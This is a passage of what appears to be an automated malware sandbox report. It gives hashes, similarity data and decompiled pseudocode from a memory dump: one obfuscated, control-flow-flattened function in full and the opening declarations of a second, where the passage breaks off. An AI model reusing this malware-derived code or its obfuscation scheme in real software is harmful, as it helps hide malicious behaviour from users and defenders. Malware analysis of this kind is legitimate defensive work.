                          • Opcode Fuzzy Hash: 0b82ea4b7c4b71e1f41083769939d5d5253734d5f9755802e78838f6eefac090
                          • Instruction Fuzzy Hash: F68166721093419BC728CF24C589A5FFBE1FBE4B48F004A1DF69A56260D3B1CA49CB87
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D6540, Relevance: 8.1, Strings: 6, Instructions: 602COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E001D6540(signed int __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				signed int _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				void* _t684;
				void* _t688;
				signed int _t689;
				signed int _t694;
				signed int _t697;
				void* _t713;
				void* _t719;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t739;
				void* _t742;
				void* _t754;
				void* _t801;
				signed int _t805;
				signed int* _t806;
				void* _t810;

				_t806 =  &_v2924;
				_v2612 = _v2612 & 0x00000000;
				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0xaa4f49;
				_v2744 = 0x2f620d;
				_v2744 = _v2744 + 0x62d8;
				_v2744 = _v2744 ^ 0x002fc4cc;
				_v2656 = 0x2cfaec;
				_v2656 = _v2656 ^ 0x0cd2161f;
				_v2656 = _v2656 ^ 0x0ceeecf3;
				_v2920 = 0x32c716;
				_v2920 = _v2920 << 0xf;
				_v2920 = _v2920 * 0x3b;
				_t805 = __ecx;
				_v2920 = _v2920 | 0x68b4bac1;
				_t801 = 0x2549caa;
				_v2920 = _v2920 ^ 0xf9b543d8;
				_v2784 = 0x32d4e6;
				_v2784 = _v2784 >> 7;
				_t721 = 0x2c;
				_v2784 = _v2784 / _t721;
				_v2784 = _v2784 ^ 0x0000a674;
				_v2864 = 0xb319fb;
				_v2864 = _v2864 + 0xd9e1;
				_v2864 = _v2864 + 0xffff00cf;
				_v2864 = _v2864 + 0xffffd85e;
				_v2864 = _v2864 ^ 0x00b26dd6;
				_v2660 = 0xb27e25;
				_v2660 = _v2660 + 0xffffdfd3;
				_v2660 = _v2660 ^ 0x00b99797;
				_v2716 = 0xc7fe75;
				_v2716 = _v2716 + 0xffff31f2;
				_v2716 = _v2716 ^ 0x00c78a4c;
				_v2640 = 0xaeac8;
				_v2640 = _v2640 >> 0xe;
				_v2640 = _v2640 ^ 0x000277b4;
				_v2908 = 0x10077a;
				_v2908 = _v2908 + 0x68bd;
				_v2908 = _v2908 + 0xffff2116;
				_v2908 = _v2908 ^ 0xc54851cd;
				_v2908 = _v2908 ^ 0xc544d31b;
				_v2736 = 0x20a398;
				_v2736 = _v2736 + 0xffff0563;
				_v2736 = _v2736 ^ 0x001e08ef;
				_v2780 = 0x1d5a40;
				_v2780 = _v2780 + 0xfffff9c7;
				_v2780 = _v2780 + 0xffff794c;
				_v2780 = _v2780 ^ 0x0014447a;
				_v2916 = 0x29a4cb;
				_v2916 = _v2916 + 0xffff976d;
				_v2916 = _v2916 << 0xc;
				_v2916 = _v2916 ^ 0xd9e702bb;
				_v2916 = _v2916 ^ 0x4a29d2a0;
				_v2892 = 0xf9f655;
				_v2892 = _v2892 | 0x0b15f937;
				_v2892 = _v2892 + 0x9fa5;
				_v2892 = _v2892 << 0xf;
				_v2892 = _v2892 ^ 0x4f87a491;
				_v2804 = 0x8782fc;
				_v2804 = _v2804 ^ 0xdd81eb44;
				_v2804 = _v2804 + 0xffff6092;
				_v2804 = _v2804 ^ 0xdd08276f;
				_v2900 = 0x145bb0;
				_v2900 = _v2900 ^ 0xbb062dbe;
				_v2900 = _v2900 << 0xb;
				_t722 = 0x47;
				_v2900 = _v2900 / _t722;
				_v2900 = _v2900 ^ 0x02171860;
				_v2884 = 0xa0bec9;
				_v2884 = _v2884 + 0xe73b;
				_t723 = 9;
				_v2884 = _v2884 / _t723;
				_v2884 = _v2884 << 5;
				_v2884 = _v2884 ^ 0x023b27f7;
				_v2728 = 0x769a57;
				_v2728 = _v2728 ^ 0xf82d310f;
				_v2728 = _v2728 ^ 0xf85c91ef;
				_v2860 = 0x37f683;
				_v2860 = _v2860 | 0xf0b97ca0;
				_v2860 = _v2860 ^ 0xe1b88346;
				_v2860 = _v2860 | 0x851887c8;
				_v2860 = _v2860 ^ 0x95163fc9;
				_v2868 = 0xd98716;
				_t724 = 0x43;
				_v2868 = _v2868 * 0x4b;
				_v2868 = _v2868 * 0x55;
				_v2868 = _v2868 / _t724;
				_v2868 = _v2868 ^ 0x009101df;
				_v2876 = 0xf11c91;
				_t725 = 0x4b;
				_v2876 = _v2876 / _t725;
				_t726 = 5;
				_v2876 = _v2876 * 0x2a;
				_v2876 = _v2876 >> 1;
				_v2876 = _v2876 ^ 0x004ca641;
				_v2832 = 0x3a7ad7;
				_v2832 = _v2832 + 0xffff0fb3;
				_v2832 = _v2832 ^ 0x7ad81000;
				_v2832 = _v2832 ^ 0x7aee2116;
				_v2844 = 0xc3babb;
				_v2844 = _v2844 >> 7;
				_v2844 = _v2844 ^ 0x8633c317;
				_v2844 = _v2844 ^ 0x863d303c;
				_v2796 = 0xf9f147;
				_v2796 = _v2796 * 0x1f;
				_v2796 = _v2796 * 0x4e;
				_v2796 = _v2796 ^ 0x38ccc6dc;
				_v2720 = 0x9c53e2;
				_v2720 = _v2720 * 0x57;
				_v2720 = _v2720 ^ 0x35251ab4;
				_v2764 = 0x1fe5b6;
				_v2764 = _v2764 | 0x49ac0c10;
				_v2764 = _v2764 * 0x1c;
				_v2764 = _v2764 ^ 0x10f7ba24;
				_v2816 = 0xc0bc9a;
				_v2816 = _v2816 + 0xffff3013;
				_v2816 = _v2816 / _t726;
				_v2816 = _v2816 ^ 0x00296678;
				_v2704 = 0xc38c22;
				_v2704 = _v2704 + 0xffff365c;
				_v2704 = _v2704 ^ 0x00cf5b8a;
				_v2712 = 0x642ede;
				_v2712 = _v2712 >> 0xa;
				_v2712 = _v2712 ^ 0x000e1ac4;
				_v2824 = 0x293da3;
				_v2824 = _v2824 + 0xffff648f;
				_v2824 = _v2824 << 4;
				_v2824 = _v2824 ^ 0x028d8b63;
				_v2792 = 0xe42bc6;
				_v2792 = _v2792 | 0xdbd15fbe;
				_v2792 = _v2792 >> 4;
				_v2792 = _v2792 ^ 0x0db3b95e;
				_v2800 = 0x863821;
				_v2800 = _v2800 >> 1;
				_v2800 = _v2800 + 0xd3a0;
				_v2800 = _v2800 ^ 0x0044dfda;
				_v2808 = 0x925047;
				_v2808 = _v2808 << 1;
				_v2808 = _v2808 ^ 0xaf5f3bf9;
				_v2808 = _v2808 ^ 0xae7db7f1;
				_v2756 = 0xe94a86;
				_v2756 = _v2756 ^ 0xc8b33b3f;
				_v2756 = _v2756 | 0xcc5831a0;
				_v2756 = _v2756 ^ 0xcc58e7e2;
				_v2700 = 0xc5ee34;
				_v2700 = _v2700 ^ 0x0c8e0e62;
				_v2700 = _v2700 ^ 0x0c4df504;
				_v2692 = 0xdacd2e;
				_v2692 = _v2692 | 0x1b4c4552;
				_v2692 = _v2692 ^ 0x1bd43d8f;
				_v2652 = 0x8d1e3c;
				_v2652 = _v2652 | 0x25fd472e;
				_v2652 = _v2652 ^ 0x25f41f2e;
				_v2872 = 0x385869;
				_t727 = 0x67;
				_v2872 = _v2872 * 0x72;
				_v2872 = _v2872 >> 0xf;
				_v2872 = _v2872 | 0xb7fb6a2a;
				_v2872 = _v2872 ^ 0xb7ff0374;
				_v2812 = 0xdd1f2e;
				_v2812 = _v2812 * 0x75;
				_v2812 = _v2812 >> 5;
				_v2812 = _v2812 ^ 0x032df31a;
				_v2740 = 0xea916c;
				_v2740 = _v2740 | 0xee59dc55;
				_v2740 = _v2740 ^ 0xeef8a503;
				_v2676 = 0xf7667b;
				_v2676 = _v2676 | 0x312cb279;
				_v2676 = _v2676 ^ 0x31f069d6;
				_v2684 = 0x26b238;
				_v2684 = _v2684 * 0x38;
				_v2684 = _v2684 ^ 0x08791e35;
				_v2924 = 0x9d8ac4;
				_v2924 = _v2924 << 1;
				_v2924 = _v2924 ^ 0xedefc6df;
				_v2924 = _v2924 | 0x7e502baa;
				_v2924 = _v2924 ^ 0xfeda65da;
				_v2888 = 0xed10c6;
				_v2888 = _v2888 << 8;
				_v2888 = _v2888 * 0x24;
				_v2888 = _v2888 >> 0xc;
				_v2888 = _v2888 ^ 0x000919c0;
				_v2664 = 0x1f3552;
				_v2664 = _v2664 / _t727;
				_v2664 = _v2664 ^ 0x000b6060;
				_v2752 = 0x47b9f5;
				_v2752 = _v2752 + 0xffffdbc2;
				_v2752 = _v2752 * 0x52;
				_v2752 = _v2752 ^ 0x16ea1dfc;
				_v2760 = 0x3ff7db;
				_v2760 = _v2760 ^ 0x4f7326af;
				_v2760 = _v2760 | 0xe6039ada;
				_v2760 = _v2760 ^ 0xef494a35;
				_v2768 = 0xda61e4;
				_v2768 = _v2768 ^ 0xde1baa62;
				_v2768 = _v2768 + 0xffffd49f;
				_v2768 = _v2768 ^ 0xdec3f05a;
				_v2688 = 0x5b052b;
				_v2688 = _v2688 | 0xb7018ea2;
				_v2688 = _v2688 ^ 0xb75acc84;
				_v2696 = 0xc8e0b;
				_v2696 = _v2696 + 0x26e;
				_v2696 = _v2696 ^ 0x000fb538;
				_v2776 = 0xe18ab3;
				_t728 = 0x55;
				_v2776 = _v2776 * 0x78;
				_v2776 = _v2776 + 0xffffbb5d;
				_v2776 = _v2776 ^ 0x69bff61f;
				_v2912 = 0xa4fec3;
				_v2912 = _v2912 ^ 0x5d1cdb4c;
				_v2912 = _v2912 + 0xffffd6eb;
				_v2912 = _v2912 + 0xffffe766;
				_v2912 = _v2912 ^ 0x5db0f62f;
				_v2856 = 0x49daf8;
				_v2856 = _v2856 * 0x42;
				_v2856 = _v2856 >> 4;
				_v2856 = _v2856 | 0x138dbc56;
				_v2856 = _v2856 ^ 0x13bbcd08;
				_v2672 = 0xb54fbf;
				_v2672 = _v2672 << 8;
				_v2672 = _v2672 ^ 0xb5430561;
				_v2648 = 0x98267;
				_v2648 = _v2648 + 0xad8e;
				_v2648 = _v2648 ^ 0x000177aa;
				_v2904 = 0x97baa2;
				_v2904 = _v2904 ^ 0x3853038d;
				_v2904 = _v2904 >> 0x10;
				_v2904 = _v2904 ^ 0xc801ad05;
				_v2904 = _v2904 ^ 0xc80c5adf;
				_v2840 = 0xdada91;
				_v2840 = _v2840 >> 5;
				_v2840 = _v2840 + 0xffffcc86;
				_v2840 = _v2840 ^ 0x000ee60b;
				_v2880 = 0x4b131c;
				_v2880 = _v2880 ^ 0x8c36c4d4;
				_t729 = 0x2b;
				_v2880 = _v2880 / _t728;
				_v2880 = _v2880 ^ 0xf9d4cca3;
				_v2880 = _v2880 ^ 0xf87ce1c2;
				_v2828 = 0xc64ac5;
				_v2828 = _v2828 / _t729;
				_v2828 = _v2828 << 0x10;
				_v2828 = _v2828 ^ 0x9c8278ff;
				_v2668 = 0x64007c;
				_v2668 = _v2668 << 1;
				_v2668 = _v2668 ^ 0x00cf46fd;
				_v2732 = 0xb494ea;
				_v2732 = _v2732 ^ 0x89f26255;
				_v2732 = _v2732 ^ 0x894c3b6b;
				_v2772 = 0x969b28;
				_v2772 = _v2772 + 0x56d6;
				_v2772 = _v2772 ^ 0xd5bd63f1;
				_v2772 = _v2772 ^ 0xd52a3e3a;
				_v2820 = 0x13a0c3;
				_v2820 = _v2820 << 0xc;
				_v2820 = _v2820 << 0xd;
				_v2820 = _v2820 ^ 0x8601b35f;
				_v2896 = 0xeae219;
				_v2896 = _v2896 + 0xb714;
				_v2896 = _v2896 + 0xf633;
				_v2896 = _v2896 ^ 0xa59ae388;
				_v2896 = _v2896 ^ 0xa57f69c1;
				_v2644 = 0xfd8482;
				_v2644 = _v2644 ^ 0x7dcc11e0;
				_v2644 = _v2644 ^ 0x7d3a680c;
				_v2788 = 0xfbffea;
				_t730 = 0x7b;
				_v2788 = _v2788 / _t730;
				_v2788 = _v2788 << 5;
				_v2788 = _v2788 ^ 0x004132b9;
				_v2708 = 0xdb0a5d;
				_t731 = 0x12;
				_v2708 = _v2708 / _t731;
				_v2708 = _v2708 ^ 0x00000a1c;
				_v2852 = 0x3f0908;
				_v2852 = _v2852 + 0xffff3d19;
				_v2852 = _v2852 + 0x216a;
				_v2852 = _v2852 << 7;
				_v2852 = _v2852 ^ 0x1f357218;
				_v2848 = 0x879d68;
				_v2848 = _v2848 >> 5;
				_v2848 = _v2848 ^ 0x8e7a48e6;
				_v2848 = _v2848 ^ 0x8e717cd4;
				_v2836 = 0x4cc355;
				_t732 = 0x72;
				_v2836 = _v2836 * 0x3b;
				_v2836 = _v2836 + 0xf9fe;
				_v2836 = _v2836 ^ 0x11b3464d;
				_v2724 = 0x32042b;
				_v2724 = _v2724 + 0xffffa0e7;
				_v2724 = _v2724 ^ 0x0034b08b;
				_v2748 = 0x4f929e;
				_v2748 = _v2748 / _t732;
				_v2748 = _v2748 ^ 0x000548c3;
				_v2680 = 0x3c8a4b;
				_t733 = 0x68;
				_v2680 = _v2680 / _t733;
				_v2680 = _v2680 ^ 0x00071b83;
				_t684 = E001CFD73(_t733);
				_t800 = _v2748;
				_t719 = _t684;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t810 = _t801 - 0x8a41319;
							if(_t810 <= 0) {
								break;
							}
							__eflags = _t801 - 0x99be381;
							if(_t801 == 0x99be381) {
								__eflags = E001CCB13( &_v2636, _v2752, _v2760,  &_v2628);
								if(__eflags == 0) {
									_t801 = 0x19f21b3;
									_t688 = 0x4d4dd5f;
									goto L26;
								} else {
									_t801 = 0xd18273e;
									while(1) {
										L1:
										goto L2;
									}
								}
								L30:
							} else {
								__eflags = _t801 - 0xd18273e;
								if(_t801 == 0xd18273e) {
									_t689 = E001CBD61(_v2768, _v2688, _v2632, _v2636, _v2696, _v2776);
									_t800 = _t689;
									_t806 =  &(_t806[4]);
									__eflags = _t689;
									_t688 = 0x4d4dd5f;
									_t801 =  !=  ? 0x4d4dd5f : 0x5dba7cd;
									continue;
								} else {
									__eflags = _t801 - 0xd26e990;
									if(_t801 == 0xd26e990) {
										E001CAE43(_t800, _v2852, _v2848);
										_pop(_t739);
										_t801 = 0x5dba7cd;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										__eflags = _t801 - 0xdc5bd12;
										if(__eflags != 0) {
											goto L26;
										} else {
											E001D855C( &_v2084, _v2908, __eflags, _v2736, _v2780, _t739, _v2916);
											 *((short*)(E001C2B69(_v2892, _v2804,  &_v2084, _v2900))) = 0;
											E001C3432( &_v524, _v2884, __eflags, _v2728);
											_push(_v2876);
											_push(_v2868);
											_t713 = E001DCD35(0x1c1404, _v2860, __eflags);
											_pop(_t754);
											E001D2EA5( &_v524, __eflags,  &_v2084, _t754, _v2844, _v2796, _t713, _v2720, _v2764,  &_v2604);
											E001D629F(_v2816, _t713, _v2704, _v2712, _v2824);
											_t739 = _t805;
											_t697 = E001DE5A7(_t739, _v2792, _v2800,  &_v2604, _v2808);
											_t806 =  &(_t806[0x15]);
											__eflags = _t697;
											if(__eflags != 0) {
												_t801 = 0x8a41319;
												while(1) {
													L1:
													goto L2;
												}
											}
										}
									}
								}
							}
							L29:
							return _t697;
							goto L30;
						}
						if(_t810 == 0) {
							_v2624 = E001D4AB5();
							_t694 = E001CB01D(_v2692, _v2652, _t693, _v2872);
							_pop(_t742);
							_v2620 = 2 + _t694 * 2;
							_t739 = _v2812;
							_t697 = E001C5370(_t739, _t719,  &_v2628, _t719, _v2740, _v2676, _t719, _v2656, _v2684, _t742, _t742, _v2924, _v2888, _v2664);
							_t806 =  &(_t806[0xc]);
							__eflags = _t697;
							if(__eflags != 0) {
								_t801 = 0x99be381;
								goto L1;
							}
						} else {
							if(_t801 == 0x14445e2) {
								_push(_t739);
								_t739 =  &_v1044;
								E001DEA55(_t739, _v2820, __eflags, _v2896, 0, _v2644, 1, _v2788, _v2708, 0);
								_t806 =  &(_t806[8]);
								_t801 = 0xd26e990;
								while(1) {
									L1:
									goto L2;
								}
							} else {
								if(_t801 == 0x19f21b3) {
									return E001D4A33(_v2748, _v2680, _v2628);
								}
								if(_t801 == 0x2549caa) {
									_t739 = _v2864;
									E001CB3B4(_t739, _t739, _v2660, _t739, _v2716,  &_v1564, _v2640, _v2744);
									_t806 =  &(_t806[7]);
									_t801 = 0xdc5bd12;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									if(_t801 == _t688) {
										_push(_v2672);
										_push(_v2856);
										E001DDD54(__eflags,  &_v1044, _v2904, E001DCD35(0x1c1454, _v2912, __eflags), _t800,  &_v2604, _v2840,  &_v1564, _v2880);
										_t739 = _v2828;
										E001D629F(_t739, _t702, _v2668, _v2732, _v2772);
										_t806 =  &(_t806[0xd]);
										_t801 = 0x14445e2;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t801 != 0x5dba7cd) {
											goto L26;
										} else {
											E001CAE43(_v2636, _v2836, _v2724);
											_pop(_t739);
											_t801 = 0x19f21b3;
											while(1) {
												L1:
												goto L2;
											}
										}
									}
								}
							}
							goto L30;
						}
						goto L29;
						L26:
						__eflags = _t801 - 0x5dc49dc;
					} while (__eflags != 0);
					return _t688;
				}
			}



















































































































                          0x001d6540
                          0x001d6546
                          0x001d6550
                          0x001d6558
                          0x001d6563
                          0x001d656e
                          0x001d6579
                          0x001d6584
                          0x001d658f
                          0x001d659a
                          0x001d65a5
                          0x001d65ad
                          0x001d65bb
                          0x001d65bf
                          0x001d65c1
                          0x001d65c9
                          0x001d65ce
                          0x001d65d6
                          0x001d65e1
                          0x001d65f2
                          0x001d65f7
                          0x001d6600
                          0x001d660b
                          0x001d6613
                          0x001d661b
                          0x001d6623
                          0x001d662b
                          0x001d6633
                          0x001d663e
                          0x001d6649
                          0x001d6654
                          0x001d665f
                          0x001d666a
                          0x001d6675
                          0x001d6680
                          0x001d6688
                          0x001d6693
                          0x001d669b
                          0x001d66a3
                          0x001d66ab
                          0x001d66b3
                          0x001d66bb
                          0x001d66c6
                          0x001d66d1
                          0x001d66dc
                          0x001d66e7
                          0x001d66f2
                          0x001d66fd
                          0x001d6708
                          0x001d6710
                          0x001d6718
                          0x001d671d
                          0x001d6725
                          0x001d672d
                          0x001d6735
                          0x001d673d
                          0x001d6745
                          0x001d674a
                          0x001d6752
                          0x001d675d
                          0x001d6768
                          0x001d6773
                          0x001d677e
                          0x001d6786
                          0x001d678e
                          0x001d6797
                          0x001d679a
                          0x001d679e
                          0x001d67a6
                          0x001d67ae
                          0x001d67be
                          0x001d67c3
                          0x001d67c9
                          0x001d67ce
                          0x001d67d6
                          0x001d67e1
                          0x001d67ec
                          0x001d67f7
                          0x001d67ff
                          0x001d6807
                          0x001d680f
                          0x001d6817
                          0x001d681f
                          0x001d682c
                          0x001d682f
                          0x001d6838
                          0x001d6844
                          0x001d6848
                          0x001d6850
                          0x001d685c
                          0x001d6861
                          0x001d686c
                          0x001d686d
                          0x001d6871
                          0x001d6875
                          0x001d687d
                          0x001d6885
                          0x001d688d
                          0x001d6895
                          0x001d689d
                          0x001d68a5
                          0x001d68aa
                          0x001d68b2
                          0x001d68ba
                          0x001d68cd
                          0x001d68dc
                          0x001d68e3
                          0x001d68ee
                          0x001d6901
                          0x001d6908
                          0x001d6913
                          0x001d691e
                          0x001d6931
                          0x001d6938
                          0x001d6943
                          0x001d694b
                          0x001d6959
                          0x001d695d
                          0x001d6965
                          0x001d6970
                          0x001d697b
                          0x001d6986
                          0x001d6991
                          0x001d6999
                          0x001d69a4
                          0x001d69ac
                          0x001d69b4
                          0x001d69b9
                          0x001d69c3
                          0x001d69ce
                          0x001d69d9
                          0x001d69e1
                          0x001d69ec
                          0x001d69f7
                          0x001d69fe
                          0x001d6a09
                          0x001d6a14
                          0x001d6a1f
                          0x001d6a26
                          0x001d6a31
                          0x001d6a3c
                          0x001d6a47
                          0x001d6a52
                          0x001d6a5d
                          0x001d6a68
                          0x001d6a73
                          0x001d6a7e
                          0x001d6a89
                          0x001d6a94
                          0x001d6a9f
                          0x001d6aaa
                          0x001d6ab5
                          0x001d6ac0
                          0x001d6acb
                          0x001d6ada
                          0x001d6adb
                          0x001d6adf
                          0x001d6ae4
                          0x001d6aec
                          0x001d6af4
                          0x001d6b07
                          0x001d6b0e
                          0x001d6b16
                          0x001d6b21
                          0x001d6b2c
                          0x001d6b37
                          0x001d6b42
                          0x001d6b4d
                          0x001d6b58
                          0x001d6b63
                          0x001d6b76
                          0x001d6b7d
                          0x001d6b88
                          0x001d6b90
                          0x001d6b94
                          0x001d6b9c
                          0x001d6ba4
                          0x001d6bac
                          0x001d6bb4
                          0x001d6bbe
                          0x001d6bc2
                          0x001d6bc7
                          0x001d6bcf
                          0x001d6be3
                          0x001d6bea
                          0x001d6bf5
                          0x001d6c00
                          0x001d6c13
                          0x001d6c1a
                          0x001d6c25
                          0x001d6c30
                          0x001d6c3b
                          0x001d6c46
                          0x001d6c51
                          0x001d6c5c
                          0x001d6c67
                          0x001d6c72
                          0x001d6c7d
                          0x001d6c88
                          0x001d6c93
                          0x001d6ca0
                          0x001d6cab
                          0x001d6cb6
                          0x001d6cc1
                          0x001d6cd6
                          0x001d6cd9
                          0x001d6ce0
                          0x001d6ceb
                          0x001d6cf6
                          0x001d6cfe
                          0x001d6d06
                          0x001d6d0e
                          0x001d6d16
                          0x001d6d1e
                          0x001d6d2b
                          0x001d6d2f
                          0x001d6d34
                          0x001d6d3c
                          0x001d6d44
                          0x001d6d4f
                          0x001d6d57
                          0x001d6d62
                          0x001d6d6d
                          0x001d6d78
                          0x001d6d83
                          0x001d6d8b
                          0x001d6d93
                          0x001d6d98
                          0x001d6da0
                          0x001d6da8
                          0x001d6db0
                          0x001d6db5
                          0x001d6dbd
                          0x001d6dc5
                          0x001d6dcd
                          0x001d6ddb
                          0x001d6ddc
                          0x001d6de2
                          0x001d6dea
                          0x001d6df2
                          0x001d6e02
                          0x001d6e06
                          0x001d6e0b
                          0x001d6e13
                          0x001d6e1e
                          0x001d6e25
                          0x001d6e30
                          0x001d6e3b
                          0x001d6e46
                          0x001d6e51
                          0x001d6e5c
                          0x001d6e67
                          0x001d6e72
                          0x001d6e7d
                          0x001d6e85
                          0x001d6e8a
                          0x001d6e8f
                          0x001d6e97
                          0x001d6e9f
                          0x001d6ea7
                          0x001d6eaf
                          0x001d6eb7
                          0x001d6ebf
                          0x001d6eca
                          0x001d6ed5
                          0x001d6ee2
                          0x001d6ef4
                          0x001d6ef9
                          0x001d6f02
                          0x001d6f0a
                          0x001d6f15
                          0x001d6f27
                          0x001d6f2c
                          0x001d6f35
                          0x001d6f40
                          0x001d6f48
                          0x001d6f50
                          0x001d6f58
                          0x001d6f5d
                          0x001d6f65
                          0x001d6f6d
                          0x001d6f72
                          0x001d6f7a
                          0x001d6f82
                          0x001d6f8f
                          0x001d6f92
                          0x001d6f96
                          0x001d6f9e
                          0x001d6fa6
                          0x001d6fb1
                          0x001d6fbc
                          0x001d6fc7
                          0x001d6fdd
                          0x001d6fe4
                          0x001d6fef
                          0x001d7001
                          0x001d7004
                          0x001d700b
                          0x001d7021
                          0x001d7026
                          0x001d702d
                          0x001d702f
                          0x001d702f
                          0x001d7034
                          0x001d7034
                          0x001d7034
                          0x001d7034
                          0x001d703a
                          0x00000000
                          0x00000000
                          0x001d722e
                          0x001d7234
                          0x001d73f9
                          0x001d73fb
                          0x001d7407
                          0x001d740c
                          0x00000000
                          0x001d73fd
                          0x001d73fd
                          0x001d702f
                          0x001d702f
                          0x00000000
                          0x001d702f
                          0x001d702f
                          0x00000000
                          0x001d723a
                          0x001d723a
                          0x001d7240
                          0x001d73b7
                          0x001d73bc
                          0x001d73be
                          0x001d73c1
                          0x001d73c8
                          0x001d73cd
                          0x00000000
                          0x001d7246
                          0x001d7246
                          0x001d724c
                          0x001d737d
                          0x001d7382
                          0x001d7383
                          0x001d702f
                          0x001d702f
                          0x00000000
                          0x001d702f
                          0x001d7252
                          0x001d7252
                          0x001d7258
                          0x00000000
                          0x001d725e
                          0x001d727c
                          0x001d72aa
                          0x001d72b4
                          0x001d72c1
                          0x001d72c5
                          0x001d72cd
                          0x001d72d3
                          0x001d730f
                          0x001d7332
                          0x001d7341
                          0x001d7359
                          0x001d735e
                          0x001d7361
                          0x001d7363
                          0x001d7369
                          0x001d702f
                          0x001d702f
                          0x00000000
                          0x001d702f
                          0x001d702f
                          0x001d7363
                          0x001d7258
                          0x001d724c
                          0x001d7240
                          0x001d7444
                          0x001d7444
                          0x00000000
                          0x001d7444
                          0x001d7040
                          0x001d71b8
                          0x001d71bf
                          0x001d71c5
                          0x001d71da
                          0x001d720b
                          0x001d7214
                          0x001d7219
                          0x001d721c
                          0x001d721e
                          0x001d7224
                          0x00000000
                          0x001d7224
                          0x001d7046
                          0x001d704c
                          0x001d7152
                          0x001d715c
                          0x001d7180
                          0x001d7185
                          0x001d7188
                          0x001d702f
                          0x001d702f
                          0x00000000
                          0x001d702f
                          0x001d7052
                          0x001d7058
                          0x00000000
                          0x001d7439
                          0x001d7064
                          0x001d713c
                          0x001d7140
                          0x001d7145
                          0x001d7148
                          0x001d702f
                          0x001d702f
                          0x00000000
                          0x001d702f
                          0x001d706a
                          0x001d706c
                          0x001d7099
                          0x001d70a5
                          0x001d70e1
                          0x001d70fd
                          0x001d7104
                          0x001d7109
                          0x001d710c
                          0x001d702f
                          0x001d702f
                          0x00000000
                          0x001d702f
                          0x001d706e
                          0x001d7074
                          0x00000000
                          0x001d707a
                          0x001d708c
                          0x001d7091
                          0x001d7092
                          0x001d702f
                          0x001d702f
                          0x00000000
                          0x001d702f
                          0x001d702f
                          0x001d7074
                          0x001d706c
                          0x001d7064
                          0x00000000
                          0x001d704c
                          0x00000000
                          0x001d7411
                          0x001d7411
                          0x001d7411
                          0x00000000
                          0x001d7034

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 5JI$;$iX8$j!$xf)$|
                          • API String ID: 0-167986053
                          • Opcode ID: baad7df7010c0cad06079cace8bd07d46c2b35b752e0045ddb9d176a6072d067
                          • Instruction ID: 998f4a6671f6143ea62ec6906f4fd8351b3d6534360b31bf71791d23467ec6c0
                          • Opcode Fuzzy Hash: baad7df7010c0cad06079cace8bd07d46c2b35b752e0045ddb9d176a6072d067
                          • Instruction Fuzzy Hash: 2B72FC7150C3819FD3B8CF21C54AB8BBBE1BBD5708F00891EE29A96260D7B19949CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CC0EA, Relevance: 7.9, Strings: 6, Instructions: 377COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E001CC0EA(signed int __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				short _v2604;
				intOrPtr _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				unsigned int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t457;
				signed int _t476;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t535;
				void* _t536;
				signed int* _t540;

